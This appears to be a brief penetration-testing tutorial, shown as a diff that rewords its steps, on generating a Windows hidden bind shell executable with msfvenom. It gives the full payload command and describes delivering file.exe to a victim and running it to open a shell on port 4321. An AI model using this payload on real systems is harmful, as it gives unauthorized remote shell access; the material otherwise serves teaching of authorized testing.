Penetration Testing

 Let’s Begin!!

-Using the msfvenom, we are going to create a payload for windows by shell_hidden_bind_tcp and will save it in the exe format name as file.exe, now we will send the file on the victim’s PC and execute that malicious file.exe on the victim’s system. it will open a new service on the victim’s pc having port number 4321 which makes the connection with the pentester’s IP.
+Using the msfvenom tool in Metasploit Windows Hidden Bind Shell, we are going to create a payload for Windows by using the shell_hidden_bind_tcp module and save it in the exe format named file.exe.
+We will then send the file to the victim’s PC and execute the malicious file.exe on the victim’s system.
+It will open a new service on the victim’s PC with port number 4321, which establishes a connection with the pentester’s IP.

 msfvenom -p windows/shell_hidden_bind_tcp ahost=192.168.1.2 lport=4321 -f exe > file.exe